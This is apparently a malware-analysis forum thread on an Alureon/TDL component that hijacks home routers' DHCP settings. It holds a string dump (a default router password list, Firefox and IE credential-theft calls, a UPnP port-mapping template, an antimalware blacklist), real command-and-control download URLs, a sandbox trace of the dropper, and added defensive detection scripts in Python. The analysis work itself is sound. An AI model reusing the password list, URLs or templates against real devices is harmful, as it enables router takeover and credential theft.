A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #3274  by EP_X0FF
 Sun Oct 31, 2010 10:47 am
This subcomponent of the Alureon family looks non-trivial :) Seems to be the one we were talking about a long time ago here.
http://www.kernelmode.info/forum/viewto ... =19&p=2696

http://www.virustotal.com/file-scan/rep ... 1288521202

Drops itself as usual through the spooler and then uses NtQueueApcThread-based injection (ernel32.dll) + NtResumeThread splicing.

As payload, it modifies the DHCP registry to point to a malicious DHCP server. Contains a list of default passwords (e.g. administrator, router, etc.).

Runs itself as a job through Task Scheduler
551ffeb7.job hxxp://www.birungueta.blogspot.com Blog do Birungueta c:\documents and settings\UserName\application data\551ffeb7.exe

Tries to contact a few malicious URLs (addresses hardcoded in the binary).

Contains some sort of security tools blacklist.
mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe
Unpacked payload dll internals
CONTENT-LENGTH:
------------------------
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/ http://%s/%s GET SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d 1406 %s\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d AppEvents\Schemes\Apps\Explorer\Navigating\.current SYSTEM\CurrentControlSet\Control\Class\{72631E54-78A4-11D0-BCF7-00AA00B7B32A}\ %s InfSection cmbatt_inst explorer.exe InstallDate SOFTWARE\Microsoft\Windows NT\CurrentVersion %c-%08X-%X%X%X%X %c-%08X-defaultx 10.0.0.10 about.blank default none %s;%d.%d;%s;%s;%s;%d;%s;%s;%d;%s;%s;%s http\shell\open\command version software\microsoft\internet explorer defaut: %s
ie: %s
nav()
timeout(10000)
java(;)
hxxp://93.174.90.26/bsfk.php die ENDOFBLOCK getgrab ok
advapi32.dll CredFree CredEnumerateA abe2869f-9b47-4cd9-a358-c22904dba7f7 %ws login.php login_fail.php login_auth.asp login_fail.asp login.html firstuse.lp login.lp h t t p : / / % S / % S %s\Software\Microsoft\Internet Explorer\IntelliForms\Storage%d Software\Microsoft\Internet Explorer\IntelliForms\Storage%d %s:%s pstorec.dll PStoreCreateInstance : S t r i n g D a t a Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;
epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234 CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox 3.5 3.6 \Main %s\%s%s Install Directory mozcrt19.dll sqlite3.dll nspr4.dll plc4.dll
plds4.dll nssutil3.dll softokn3.dll nss3.dll %s\%s NSS_Init PK11_GetInternalKeySlot PK11_Authenticate NSSBase64_DecodeBuffer PK11SDR_Decrypt PK11_FreeSlot NSS_Shutdown
sqlite3_open sqlite3_close sqlite3_prepare_v2 sqlite3_step sqlite3_column_text \Mozilla\Firefox\Profiles\* signons.sqlite select * from moz_logins NetFriendContainer %X
LOCATION: // SERVER: urn:schemas-upnp-org:device:InternetGatewayDevice:1 urn:schemas-upnp-org:service:WANIPConnection:1
urn:schemas-upnp-org:service:WANPPPConnection:1 239.255.255.250 M-SEARCH * HTTP/1.1
HOST: 239.255.255.250:1900
ST: %s
MAN: "ssdp:discover"
MX: %d

manufacturer modelName modelNumber controlURL http http://%s:%d%s <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetSpecificPortMappingEntry" upnperror <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:AddPortMapping xmlns:m="%s"><NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost><NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewExternalPort><NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol><NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">%d</NewInternalPort><NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">%s</NewInternalClient><NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" 
dt:dt="boolean">1</NewEnabled><NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription><NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration></m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#AddPortMapping" <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><m:GetExternalIPAddress xmlns:m="%s"></m:GetExternalIPAddress></SOAP-ENV:Body></SOAP-ENV:Envelope> SOAPAction: "%s#GetExternalIPAddress" NewExternalIPAddress POST Content-Type: application/x-www-form-urlencoded %s
%s Authorization: Basic %s http://microsoft.com/ ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ %s%s
SeTcbPrivilege %08x %X%X%X%X mbam.exe spybotsd.exe combofix.exe superantispyware.exe mrt.exe iexplore.exe firefox.exe safari.exe opera.exe svchost.exe netsvcs spoolsv.exe spooler \%s.dll <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
%s.manifest open .exe kernel32.dll ernel32.dll LoadLibraryExA T r i g g e r 1 G o o g l e DhcpNameServer NameServer SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\%s %d.%d.%d.%d,%d.%d.%d.%d WSPStartup msafd mswsock //tag: //img: &q= %s%c%s=%s%s%s Set-Cookie: kw=%s http://google.com/ j.js http://%d.%d.%d.%d/%s?m=4&a=%d&i=%s&u=%s .google. search.yahoo. search.msn. search.live. altavista.com ask.com search.aol. saerch.aol. search.icq. alltheweb.com bing.com yandex.ru rambler.ru go.mail.ru sm.aport.ru /search? /custom? /ie? /url? search. /search results.asp /web/results? /web? /results.php? /yandsearch? /scripts/template.dll? / .youtube. .wikipedia. .yahoo. rds.yahoo. overture. .yimg.com wikimedia. amazon.com hotmail. .msn.com .live.com microsoft. altavista. atdmt.com wzus1.ask. /i/i.gif? opselect.com aolcdn aolsearch .aol. revsci.net atwola. digitalcity. .icq. o.aolcdn.com alltheweb. bing. .yandex. tns-counter. .rambler. .rl0.ru .begun. list.ru .mail.ru z5x.net imgsmail.ru .aport. yadro.ru .ag.ru <html><head><meta http-equiv="refresh" content="10;url=%s">
<script>window.status="%s";</script>
<script src="http://%s:%d/%s?m=3&a=%d&i=%s&u=%s"></script>
Connection: Close
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate
Content-Length: HTTP/1.1 200 OK
%s%d
%s <script>click="<html><body onLoad='document.main.submit()'>%s<form action='%s' name='main' method='post'";if(top.location==parent.location) click+="target='_parent'";document.write(click+"></body></html>");</script>
HTTP/1.0 307 Temporary Redirect
%s0
Location: %s
Content-Length: ETag: Cookie: kw= & GET results5.google. /url?sa=t&source=web Host: http://%s%s Referer: /favicon.ico dynvolume.com %s\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\ %s\Software\Policies\Microsoft\Windows\WindowsUpdate WUServer | WUStatusServer %d.%dX%s;%d;%d;%s http://%s/kx.php \%s.exe Global\%s %s%d \ernel32.dll UacDisableNotify software\microsoft\Security Center EnableLUA SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System defaultid NtResumeThread
Attachments
pass: malware
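The strings above include a full UPnP AddPortMapping SOAP template. As an added illustration (not code from EP_X0FF's post or from the sample), here is a small Python parser a gateway-side monitor or IDS could use to pull the mapping arguments out of such a request and flag the traits this template has: a permanent lease, a description that is just the protocol name, and an internal LAN host being exposed. The sample request is constructed by filling the template's placeholders with made-up values; the heuristics and names (`parse_add_port_mapping`, `assess`) are my own.

```python
import ipaddress
import xml.etree.ElementTree as ET
from dataclasses import dataclass
from typing import List, Optional

SOAP_NS = "http://schemas.xmlsoap.org/soap/envelope/"
# Both service URNs appear in the strings dump; the template uses either one as xmlns:m.
SERVICE_NS = (
    "urn:schemas-upnp-org:service:WANIPConnection:1",
    "urn:schemas-upnp-org:service:WANPPPConnection:1",
)


@dataclass
class PortMapping:
    service_ns: str
    protocol: str
    external_port: int
    internal_port: int
    internal_client: str
    description: str
    lease_seconds: int


def parse_add_port_mapping(xml_text: str) -> Optional[PortMapping]:
    """Return the AddPortMapping arguments in a SOAP body, or None for any other action."""
    root = ET.fromstring(xml_text)
    body = root.find(f"{{{SOAP_NS}}}Body")
    if body is None:
        return None
    for ns in SERVICE_NS:
        action = body.find(f"{{{ns}}}AddPortMapping")
        if action is not None:
            break
    else:
        return None

    def arg(name: str) -> str:
        # The argument elements only carry dt:dt attributes, so they live in no namespace.
        el = action.find(name)
        return (el.text or "").strip() if el is not None else ""

    return PortMapping(
        service_ns=ns,
        protocol=arg("NewProtocol"),
        external_port=int(arg("NewExternalPort") or 0),
        internal_port=int(arg("NewInternalPort") or 0),
        internal_client=arg("NewInternalClient"),
        description=arg("NewPortMappingDescription"),
        lease_seconds=int(arg("NewLeaseDuration") or 0),
    )


def assess(mapping: PortMapping) -> List[str]:
    """Heuristics (my own, not from the sample) a monitor could raise on an AddPortMapping."""
    findings = []
    if mapping.lease_seconds == 0:
        findings.append("permanent mapping (NewLeaseDuration=0)")
    if mapping.description == mapping.protocol:
        # The template fills NewPortMappingDescription with the literal "TCP";
        # ordinary clients put an application name there, so this is a cheap fingerprint.
        findings.append("description is just the protocol name")
    try:
        client = ipaddress.ip_address(mapping.internal_client)
        if client.is_private:
            findings.append(
                f"exposes internal host {client}:{mapping.internal_port} "
                f"on external port {mapping.external_port}"
            )
    except ValueError:
        findings.append(f"non-IP NewInternalClient {mapping.internal_client!r}")
    return findings


# Constructed request: the thread's SOAP template with its %d/%s placeholders filled in.
SAMPLE_REQUEST = (
    '<?xml version="1.0"?>'
    '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" '
    'SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    "<SOAP-ENV:Body>"
    '<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">'
    '<NewRemoteHost xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string"></NewRemoteHost>'
    '<NewExternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">8080</NewExternalPort>'
    '<NewProtocol xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewProtocol>'
    '<NewInternalPort xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui2">80</NewInternalPort>'
    '<NewInternalClient xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">192.168.2.4</NewInternalClient>'
    '<NewEnabled xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="boolean">1</NewEnabled>'
    '<NewPortMappingDescription xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="string">TCP</NewPortMappingDescription>'
    '<NewLeaseDuration xmlns:dt="urn:schemas-microsoft-com:datatypes" dt:dt="ui4">0</NewLeaseDuration>'
    "</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>"
)

if __name__ == "__main__":
    mapping = parse_add_port_mapping(SAMPLE_REQUEST)
    print(mapping)
    for finding in assess(mapping):
        print("-", finding)
```

The same parser applies to a request sent under the WANPPPConnection namespace, since the action is looked up under both service URNs from the strings dump; a request whose body carries a different action (GetExternalIPAddress, for instance) returns None rather than a mapping.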
 #3277  by EP_X0FF
 Sun Oct 31, 2010 2:30 pm
Don't have a router at hand this time, so no 100% answer. But looking at the code and strings inside the payload, I think the answer will be yes. It contains code/patterns for D-Link and Linksys router admin pages and an array of default passwords.
Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;airlive;
alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;motorola;mysweex;password1;
sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;vodafone;zoomadsl admin;;root;Admin;1234
 #3881  by EP_X0FF
 Wed Dec 08, 2010 4:07 pm
This is a TDL downloader. It does not contain the actual rootkit inside, but it works like a typical TDL dropper (all the hot stuff such as the exploit included).
Contains link to
mbreniont.com
InternetConnectA InternetCrackUrlA InternetReadFile HttpOpenRequestA HttpSendRequestAl InternetOpenA InternetCloseHandle
Here is the payload.
Attachments
pass: malware
 #3882  by EP_X0FF
 Wed Dec 08, 2010 4:23 pm
The payload is the new version of the Alureon router stuff. It is logical; all series updated their droppers :)
index.asp dlink/hwiz.html home.asp wizard.htm login.asp cgi/b/users/switchpopup/
Password;pass;password;root;router;admin;administrator;;0;0P3N;1234;12345;123456;a;a6a7wimax;adslnadam;adslroot;
airlive;alice;atlantis;bewan;cableroot;cciadmin;conexant;ecom;epicrouter;friend;hamlet;hayesadsl;highspeed;hsparouter;
motorola;mysweex;password1;sitecom46;sky;smcadmin;stccpe_2007;telekom;telus;telus177;tmadmin;trendchip;ttnet;utstar;
vodafone;zoomadsl admin;;root;Admin;1234
 #3888  by PX5
 Wed Dec 08, 2010 9:13 pm
It does something like this:
Code:
2010-12-08 10:33:10 explorer.exe [1552.1784]: CreateProcess( C:\WINDOWS\Temp\irfvjtg.exe ) [3092] 0 kernel32 shell32 user32 comctl32 explorer shlwapi ntdll 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\xuO31m9g.dll ) [3092] 1 kernel32 irfvjtg 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll -> c:\gmpot\01CB96ED38934142_xuO31m9g_dll.PE ) 
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\xuO31m9g.dll )
2010-12-08 10:33:11 Idle [1672.3100]: NDIS: 213.163.64.36:80 -> 192.168.2.4:1049 http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1 application/x-msdos-program 73728 <-- PE   1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: Detected PE file -> C:\WINDOWS\TEMP\OCEIQ7.exe
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: NewPEFile( C:\WINDOWS\Temp\OCEIQ7.exe ) [1672] 2 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CopyFile( C:\WINDOWS\TEMP\OCEIQ7.exe -> c:\gmpot\01CB96ED397CE7B6_OCEIQ7_exe.PE ) 
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateSection( C:\WINDOWS\TEMP\OCEIQ7.exe )
2010-12-08 10:33:12 spoolsv.exe [1672.3100]: CreateProcess( C:\WINDOWS\Temp\OCEIQ7.exe ) [3108] 0 kernel32 advapi32 [unknown] 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe ) [3108] 3 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe -> c:\gmpot\01CB96ED398FFA86_21d2f7f1_exe.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: Detected PE file -> C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\aAAA3179.dll ) [3108] 4 kernel32 oceiq7  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CopyFile( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll -> c:\gmpot\01CB96ED39925CE0_aAAA3179_dll.PE ) 
2010-12-08 10:33:12 OCEIQ7.exe [3108.3112]: CreateSection( C:\WINDOWS\System32\spool\PRTPROCS\W32X86\aAAA3179.dll )
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: Detected PE file -> C:\WINDOWS\system32\ernel32.dll
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: NewPEFile( C:\WINDOWS\system32\ernel32.dll ) [1672] 5 kernel32 [unknown]  <- http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CopyFile( C:\WINDOWS\system32\ernel32.dll -> c:\gmpot\01CB96ED3A099274_ernel32_dll.PE ) 
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: CreateSection( C:\WINDOWS\system32\ernel32.dll )
2010-12-08 10:33:13 Idle [1672.3124]: NDIS: 207.46.232.182:80 -> 192.168.2.4:1051 http://microsoft.com/ text/html 23   2
2010-12-08 10:33:13 spoolsv.exe [1672.3124]: SaveHttp( http://microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A49F1F2_microsoft_com )
2010-12-08 10:33:14 Idle [1672.3124]: NDIS: 65.55.12.249:80 -> 192.168.2.4:1052 http://www.microsoft.com/ text/html 1020   3
2010-12-08 10:33:14 spoolsv.exe [1672.3124]: SaveHttp( http://www.microsoft.com/ -> c:\gmpot\TEMP\01CB96ED3A6B52DE_www_microsoft_com )
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1058 http://192.168.2.1/index.asp  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1059 http://192.168.2.1/dlink/hwiz.html  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1060 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1061 http://192.168.2.1/  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1062 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1063 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1064 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1065 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1066 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1067 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1068 http://192.168.2.1/index.asp  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1069 http://192.168.2.1/dlink/hwiz.html  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1070 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1071 http://192.168.2.1/  0   3
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1072 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:03 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1073 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1074 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1075 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1076 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
2010-12-08 10:34:04 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1077 http://192.168.2.1/login.stm  0   2

Then it makes a job file pointing to this --> C:\Documents and Settings\Owner\Application Data\21d2f7f1.exe

Captured files attached.
Attachments
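Added example (not PX5's code and not part of the sandbox that produced the trace): a Python triage pass over sandbox lines in the format quoted above, written from the detection side. It assumes the line layout `timestamp process [pid.tid]: event` and the `NDIS: src:port -> dst:port url content-type size` shape seen in the capture, and raises the findings an analyst would want from this trace: a PE written into the spooler's print-processor directory, a DLL whose name is one character off a real system DLL (ernel32.dll), an executable fetched over HTTP, and a burst of requests to the gateway's admin pages. The sample log is a cut-down constructed copy of the quoted lines; `parse_log`, `analyse`, `one_edit_away` and the threshold are my own.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Assumed line layout, taken from the quoted trace: "<date> <time> <proc> [pid.tid]: <event>"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?P<proc>\S+) "
    r"\[(?P<pid>\d+)\.(?P<tid>\d+)\]: (?P<event>.*)$"
)
NEWPE_RE = re.compile(r"NewPEFile\(\s*(.+?)\s*\)")
# System DLLs whose names are worth checking for one-character look-alikes.
SYSTEM_DLLS = ("kernel32.dll", "ntdll.dll", "advapi32.dll", "user32.dll")

# Constructed sample: a trimmed copy of the sandbox lines quoted in the post above.
SAMPLE_LOG = r"""
2010-12-08 10:33:11 irfvjtg.exe [3092.3096]: NewPEFile( C:\WINDOWS\system32\spool\prtprocs\w32x86\xuO31m9g.dll ) [3092] 1 kernel32 irfvjtg
2010-12-08 10:33:11 Idle [1672.3100]: NDIS: 213.163.64.36:80 -> 192.168.2.4:1049 http://mbreniont.com/dx.php?i=9d60a57d-1635-4cbd-9652-82d7efe1d998&a=1030145965&f=0&x64=0&os=5.1 application/x-msdos-program 73728 <-- PE   1
2010-12-08 10:33:13 spoolsv.exe [1672.3116]: NewPEFile( C:\WINDOWS\system32\ernel32.dll ) [1672] 5 kernel32 [unknown]
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1058 http://192.168.2.1/index.asp  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1059 http://192.168.2.1/dlink/hwiz.html  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1060 http://192.168.2.1/login.stm  0   2
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1061 http://192.168.2.1/  0   3
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1062 http://192.168.2.1/home.asp  0   4
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1063 http://192.168.2.1/wizard.htm  0   5
2010-12-08 10:34:02 Idle [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1065 http://192.168.2.1/login.asp  0   3
2010-12-08 10:34:02 gmpot.exe [1672.3124]: NDIS: 192.168.2.1:80 -> 192.168.2.4:1066 http://192.168.2.1/cgi/b/users/switchpopup/  0   4
"""


def parse_log(text: str) -> List[Dict[str, str]]:
    """Split trace lines into their fields; lines that do not match the layout are skipped."""
    events = []
    for line in text.strip().splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def one_edit_away(a: str, b: str) -> bool:
    """True when a and b differ by exactly one inserted, deleted or substituted character."""
    if a == b or abs(len(a) - len(b)) > 1:
        return False
    i = j = edits = 0
    while i < len(a) and j < len(b):
        if a[i] == b[j]:
            i += 1
            j += 1
            continue
        edits += 1
        if edits > 1:
            return False
        if len(a) > len(b):
            i += 1
        elif len(a) < len(b):
            j += 1
        else:
            i += 1
            j += 1
    return edits + (len(a) - i) + (len(b) - j) == 1


def analyse(events: List[Dict[str, str]], gateway: str = "192.168.2.1", probe_threshold: int = 5) -> List[str]:
    """Return human-readable findings; gateway address and threshold are assumptions for the sample."""
    findings = []
    gateway_paths = set()
    for ev in events:
        e = ev["event"]
        m = NEWPE_RE.search(e)
        if m:
            path = m.group(1)
            low = path.lower()
            name = low.rsplit("\\", 1)[-1]
            if "\\spool\\prtprocs\\" in low:
                findings.append(f"{ev['proc']} wrote PE into print-processor dir: {path}")
            for dll in SYSTEM_DLLS:
                if one_edit_away(name, dll):
                    findings.append(f"{ev['proc']} wrote look-alike of {dll}: {path}")
        elif e.startswith("NDIS:"):
            parts = e.split()
            url = urlparse(parts[4]) if len(parts) > 4 else urlparse("")
            if "application/x-msdos-program" in e:
                findings.append(f"executable fetched over HTTP from {url.hostname}")
            if url.hostname == gateway:
                gateway_paths.add(url.path)
    if len(gateway_paths) >= probe_threshold:
        findings.append(f"{len(gateway_paths)} distinct admin pages requested on gateway {gateway}")
    return findings


if __name__ == "__main__":
    for finding in analyse(parse_log(SAMPLE_LOG)):
        print("-", finding)
```

The look-alike check is deliberately wider than the one name in this trace: any file whose name sits one edit away from a listed system DLL is reported, which also catches the transposition and extra-letter variants other droppers use, at the cost of occasional noise from legitimately similar names that a reviewer then dismisses.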